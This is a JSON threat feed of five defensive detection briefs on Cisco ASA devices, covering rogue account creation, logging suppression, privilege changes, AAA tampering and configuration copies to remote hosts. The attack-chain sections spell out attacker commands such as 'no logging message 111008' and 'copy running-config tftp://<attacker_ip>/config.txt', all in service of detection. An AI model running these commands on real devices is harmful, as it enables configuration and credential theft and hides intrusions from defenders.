{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cisco-asa/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Cisco ASA"],"_cs_severities":["medium"],"_cs_tags":["cisco-asa","account-creation","persistence"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eThis analytic detects the creation of new user accounts on Cisco ASA devices via CLI or ASDM. Adversaries may create unauthorized user accounts to establish persistence, maintain backdoor access, or elevate privileges on network infrastructure devices. These rogue accounts can provide attackers with continued access even after initial compromise vectors are remediated. The detection monitors for ASA message ID 502101, which is generated whenever a new user account is created on the device, capturing details including the username, privilege level, and the administrator who created the account. The source material was published by Splunk on 2026-04-17, highlighting the continued relevance of this threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access to the Cisco ASA device via compromised credentials or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003eAttacker authenticates to the ASA device using the gained access.\u003c/li\u003e\n\u003cli\u003eAttacker executes commands to create a new local user account using the CLI or ASDM interface.\u003c/li\u003e\n\u003cli\u003eThe ASA device generates syslog message ID 502101, indicating the new account creation, which includes the username, privilege level, and creating administrator.\u003c/li\u003e\n\u003cli\u003eThe attacker assigns a high privilege level (e.g., level 15) to the new account.\u003c/li\u003e\n\u003cli\u003eAttacker uses the newly created account to maintain persistent access to the ASA device.\u003c/li\u003e\n\u003cli\u003eAttacker leverages the persistent access to perform reconnaissance, modify configurations, or disrupt network operations.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a backdoor for future access, bypassing normal authentication mechanisms.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to the network infrastructure, allowing attackers to modify configurations, intercept traffic, or disrupt services. This can result in data breaches, denial of service, and significant financial and reputational damage. While the specific number of victims or targeted sectors isn't available, the impact is significant for any organization relying on Cisco ASA devices for network security.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure Cisco ASA devices are configured to generate and forward syslog message ID 502101 to a SIEM for monitoring to enable the provided detections.\u003c/li\u003e\n\u003cli\u003eImplement the provided Sigma rule \u003ccode\u003eCisco ASA - New Local User Account Created\u003c/code\u003e to detect suspicious account creation activities.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, paying close attention to accounts with elevated privileges (level 15) and those created outside of normal business hours.\u003c/li\u003e\n\u003cli\u003eReview existing user accounts on Cisco ASA devices regularly, looking for any unauthorized or suspicious accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-04-cisco-asa-account-creation/","summary":"Detection of new user account creations on Cisco ASA devices, potentially indicating unauthorized access or persistence attempts by adversaries.","title":"Cisco ASA - New Local User Account Creation","url":"https://feed.craftedsignal.io/briefs/2024-01-04-cisco-asa-account-creation/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Cisco ASA"],"_cs_severities":["medium"],"_cs_tags":["cisco-asa","logging","defense-evasion","network"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eThis detection focuses on identifying the suppression of logging messages within Cisco ASA devices, a tactic used by adversaries to evade detection. Attackers leverage the \u0026quot;no logging message\u0026quot; command to selectively disable the logging of specific, security-critical events, such as authentication failures, configuration changes, or suspicious network activity. This approach allows them to maintain a degree of stealth while still allowing other logging functions to proceed normally, avoiding suspicion that might be raised by a complete disabling of logging. The detection specifically monitors for the execution of commands with message IDs 111008 and 111010 that include the \u0026quot;no logging message\u0026quot; command, which can suppress message IDs irrespective of the configured severity level. Identifying unauthorized or suspicious use of this command is crucial for maintaining auditability and detecting malicious activity within the network environment.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to a Cisco ASA device, potentially through stolen credentials or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the command \u003ccode\u003eenable\u003c/code\u003e to enter privileged EXEC mode.\u003c/li\u003e\n\u003cli\u003eThe attacker then enters global configuration mode using the \u003ccode\u003econfigure terminal\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies security-critical message IDs, such as those related to authentication failures or configuration changes.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eno logging message \u0026lt;message_id\u0026gt;\u003c/code\u003e command to suppress logging for these specific message IDs. For example, \u003ccode\u003eno logging message 111008\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe ASA device ceases to log events associated with the suppressed message IDs, effectively hiding the attacker's actions.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious actions on the network, knowing that these actions will not be logged.\u003c/li\u003e\n\u003cli\u003eThe attacker exits configuration mode and privileged EXEC mode, leaving the ASA device with suppressed logging.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful suppression of logging messages can severely hinder incident response and forensic investigations. If critical security events are not logged, administrators will be unaware of malicious activities occurring on the network. This can lead to delayed detection of breaches, data exfiltration, or other significant security incidents. The NCSC report referenced in the related articles details the use of similar techniques by advanced persistent threat (APT) groups to maintain persistence and evade detection on compromised systems, which highlights the potential impact of this tactic.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Cisco ASA syslog data ingestion into your SIEM using the Cisco Security Cloud TA, as required by the detection [How To Implement].\u003c/li\u003e\n\u003cli\u003eConfigure Cisco ASA devices to generate and forward message IDs 111008 and 111010, or adjust the logging level to include these messages if needed [How To Implement].\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026quot;Cisco ASA Logging Message Suppression Detected\u0026quot; to identify instances of logging message suppression [rules].\u003c/li\u003e\n\u003cli\u003eInvestigate any detected instances of message suppression, focusing on unauthorized suppressions of security-critical message IDs, suppressions by non-administrative accounts, and suppressions occurring during unusual hours [description].\u003c/li\u003e\n\u003cli\u003eEstablish a baseline of approved suppressed message IDs and monitor for deviations from this baseline [known_false_positives].\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-logging-suppression/","summary":"Adversaries may suppress specific log message IDs on Cisco ASA devices using the 'no logging message' command to selectively disable logging of security-critical events and evade detection.","title":"Cisco ASA Logging Message Suppression","url":"https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-logging-suppression/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Cisco ASA"],"_cs_severities":["high"],"_cs_tags":["cisco-asa","privilege-escalation","persistence","network"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of unauthorized privilege level modifications on Cisco ASA (Adaptive Security Appliance) devices. Threat actors may attempt to escalate privileges to gain elevated access to network infrastructure, enable additional command execution capabilities, or establish higher-level persistent access. This is achieved by modifying user account privilege levels, which range from 0 (lowest) to 15 (full administrative access). The detection strategy leverages Cisco ASA message ID 502103, triggered when a user account's privilege level is modified. This event captures crucial information, including the username, the administrator responsible for the change, and both the original and the new privilege levels. Defenders should investigate unexpected privilege changes, with particular attention to escalations to level 15, substantial privilege increases, modifications performed outside of established business hours, changes initiated by non-administrative users, or changes lacking proper change management documentation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker gains initial access to a low-privilege user account on the Cisco ASA, possibly through compromised credentials or social engineering.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e The attacker uses the compromised account to enumerate existing user accounts and their current privilege levels using CLI commands like \u003ccode\u003eshow user\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation Attempt:\u003c/strong\u003e The attacker attempts to modify the privilege level of a target account (potentially their own) using commands like \u003ccode\u003eusername \u0026lt;user\u0026gt; privilege \u0026lt;level\u0026gt;\u003c/code\u003e via CLI or ASDM.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAuthentication:\u003c/strong\u003e The ASA requires authentication for the privilege escalation attempt, often requiring administrator credentials. The attacker might attempt to brute-force or bypass this authentication.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Level Change:\u003c/strong\u003e If successful, the attacker elevates the target account's privilege level. Message ID 502103 is generated, logging the change.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand Execution:\u003c/strong\u003e With elevated privileges, the attacker can now execute privileged commands, modify network configurations, and potentially compromise the entire ASA device.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e The attacker may create new high-privilege accounts or modify existing ones to ensure continued access, even if the initial compromised account is discovered and disabled.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker uses the compromised ASA as a pivot point to gain access to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised Cisco ASA devices can lead to significant damage, including unauthorized network access, data breaches, and disruption of network services. A successful privilege escalation can grant attackers complete control over the network infrastructure. The NCSC's analysis of RayInitiator/LINE-VIPER malware highlights the potential for attackers to leverage compromised network devices for lateral movement and data exfiltration. The scope of impact depends on the organization's size and the criticality of the network services provided by the ASA.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable and forward Cisco ASA syslog data, including message ID 502103, to your SIEM using the Cisco Security Cloud TA, as required by the detection rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u003ccode\u003eCisco ASA User Privilege Level Change Detected\u003c/code\u003e to detect privilege level changes and tune it for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, paying close attention to escalations to privilege level 15, substantial increases in privilege levels, and changes made outside of normal business hours.\u003c/li\u003e\n\u003cli\u003eCorrelate privilege level change events (message ID 502103) with other security events, such as failed login attempts or suspicious network activity, to identify potential compromise.\u003c/li\u003e\n\u003cli\u003eRegularly review user accounts and their privilege levels on Cisco ASA devices.\u003c/li\u003e\n\u003cli\u003eImplement strong password policies and multi-factor authentication for all ASA administrator accounts.\u003c/li\u003e\n\u003cli\u003eRefer to the Cisco documentation linked in the references to configure and monitor ASA logging effectively.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-privilege-escalation/","summary":"Detection of unauthorized privilege level changes on Cisco ASA devices, potentially indicating privilege escalation or persistence attempts by threat actors.","title":"Cisco ASA User Privilege Level Change Detection","url":"https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-privilege-escalation/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Cisco ASA"],"_cs_severities":["high"],"_cs_tags":["cisco-asa","data-exfiltration","network-device"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eThis detection identifies file copy operations from Cisco ASA devices to remote locations, which could signal data exfiltration attempts. Threat actors targeting network infrastructure may attempt to exfiltrate sensitive data, including device configurations, logs, and packet captures, to attacker-controlled infrastructure. The analytic focuses on detecting unusual copy commands executed via the CLI or ASDM interface. Specifically, it monitors Cisco ASA logs (message IDs 111008 and 111010) for copy commands using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP. Legitimate backups to centralized servers are common, however copies to unexpected or external destinations are suspicious. This activity is associated with threat actors targeting perimeter network devices, like the ArcaneDoor campaign. Defenders should investigate copies to unexpected destinations, from non-administrative accounts, or outside approved maintenance windows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the Cisco ASA device, possibly through compromised credentials or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eAttacker authenticates to the ASA device via SSH, Telnet, CLI, or ASDM.\u003c/li\u003e\n\u003cli\u003eAttacker executes commands to copy sensitive files, such as the running configuration (\u003ccode\u003erunning-config\u003c/code\u003e) or startup configuration (\u003ccode\u003estartup-config\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecopy\u003c/code\u003e command is used with a remote protocol (TFTP, FTP, HTTP, HTTPS, SMB, SCP) to specify the destination server. For example, \u003ccode\u003ecopy running-config tftp://\u0026lt;attacker_ip\u0026gt;/config.txt\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe ASA device initiates a network connection to the attacker-controlled server using the specified protocol.\u003c/li\u003e\n\u003cli\u003eThe sensitive file is transferred to the remote server.\u003c/li\u003e\n\u003cli\u003eAttacker uses exfiltrated data to gain further knowledge of the network environment or for malicious purposes.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to remove evidence of the file copy operation from the ASA device's logs.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exfiltration of Cisco ASA device configurations and logs can provide attackers with valuable information about network topology, security policies, usernames, passwords and other sensitive data. This information can be used to facilitate further attacks, such as lateral movement within the network, compromising additional systems, or gaining unauthorized access to sensitive resources. Organizations in any sector could be affected if their perimeter security devices are compromised.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Cisco ASA syslog logging and ensure message IDs 111008 and 111010 are captured to enable this detection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eCisco ASA - Device File Copy to Remote Location\u003c/code\u003e to your SIEM and tune the filters to exclude known legitimate backup activities.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, paying close attention to the destination IP address, user account, and time of the activity.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections originating from Cisco ASA devices to external IP addresses using file transfer protocols (TFTP, FTP, HTTP, HTTPS, SMB, SCP).\u003c/li\u003e\n\u003cli\u003eReview and restrict access to Cisco ASA devices, enforcing strong password policies and multi-factor authentication to prevent unauthorized access.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised ASA device.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-file-copy/","summary":"The analytic detects file copy operations from Cisco ASA devices to remote locations using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP, potentially indicating data exfiltration by threat actors targeting network devices.","title":"Cisco ASA Device File Copy to Remote Location","url":"https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-file-copy/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Cisco Adaptive Security Appliance"],"_cs_severities":["high"],"_cs_tags":["cisco-asa","aaa-policy","privilege-escalation","persistence"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eThis brief addresses the threat of unauthorized modifications to Authentication, Authorization, and Accounting (AAA) policies on Cisco Adaptive Security Appliance (ASA) devices. Attackers, including malicious insiders, may leverage CLI or ASDM to tamper with AAA settings. The modifications can weaken authentication mechanisms, disable account lockout policies, or elevate privileges. The goal is to facilitate brute-force attacks, maintain persistent access, and potentially compromise the entire network. This activity is typically observed through Cisco ASA syslog data, specifically monitoring command execution events related to AAA policy changes. This attack matters to defenders because a compromised ASA can grant an attacker complete control over the network perimeter.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: An attacker gains initial access to the Cisco ASA's CLI or ASDM, potentially through compromised credentials or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eAuthentication Policy Modification: The attacker modifies AAA authentication policies using commands like \u003ccode\u003eaaa authentication\u003c/code\u003e, potentially increasing the maximum failed login attempts or disabling account lockout.\u003c/li\u003e\n\u003cli\u003eAuthorization Policy Modification: The attacker modifies AAA authorization policies with commands like \u003ccode\u003eaaa authorization\u003c/code\u003e, escalating privileges for specific user accounts or groups to gain administrative access.\u003c/li\u003e\n\u003cli\u003eLocal Authentication Tampering: The attacker modifies the local authentication database on the ASA with commands like \u003ccode\u003eaaa local authentication\u003c/code\u003e, creating new privileged accounts or modifying existing ones.\u003c/li\u003e\n\u003cli\u003eAAA Server Configuration Changes: The attacker alters AAA server configurations using commands like \u003ccode\u003eaaa-server\u003c/code\u003e, redirecting authentication requests to a malicious AAA server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eDisabling AAA: The attacker disables AAA features entirely using \u003ccode\u003eno aaa\u003c/code\u003e commands, bypassing all authentication and authorization controls.\u003c/li\u003e\n\u003cli\u003ePersistence: The attacker establishes persistent access by creating or modifying user accounts with elevated privileges, or by maintaining unauthorized access via weakened authentication policies.\u003c/li\u003e\n\u003cli\u003eLateral Movement \u0026amp; Data Exfiltration: With elevated privileges, the attacker moves laterally within the network, accessing sensitive data and exfiltrating it to an external location.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised AAA policies can lead to significant security breaches. An attacker can gain unauthorized access to sensitive network resources, exfiltrate confidential data, and disrupt critical business operations. Success could allow a malicious actor to pivot within the network, potentially impacting thousands of systems and resulting in substantial financial losses. This attack can severely damage an organization's reputation and erode customer trust.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Cisco ASA syslog data ingestion into your SIEM via the Cisco Security Cloud TA, ensuring message IDs 111008 and 111010 are included in the logs.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect suspicious AAA policy modifications.\u003c/li\u003e\n\u003cli\u003eReview and harden AAA policies on Cisco ASA devices regularly, enforcing strong password policies, account lockout thresholds, and multi-factor authentication where possible (reference: \u003ca href=\"https://www.cisco.com/c/en/us/td/docs/security/asa/asa-cli-reference/A-H/asa-command-ref-A-H/aa-ac-commands.html)\"\u003ehttps://www.cisco.com/c/en/us/td/docs/security/asa/asa-cli-reference/A-H/asa-command-ref-A-H/aa-ac-commands.html)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any unauthorized modifications to AAA policies, focusing on changes that weaken security posture, and compare these changes against approved change management processes (see description field).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-02-cisco-aaa-tampering/","summary":"Unauthorized modifications to Cisco ASA AAA policies via CLI or ASDM can weaken authentication mechanisms, potentially enabling brute-force attacks, privilege escalation, and persistent access by malicious actors.","title":"Cisco ASA AAA Policy Tampering","url":"https://feed.craftedsignal.io/briefs/2024-01-02-cisco-aaa-tampering/"}],"language":"en","title":"CraftedSignal Threat Feed - Cisco-Asa","version":"https://jsonfeed.org/version/1.1"}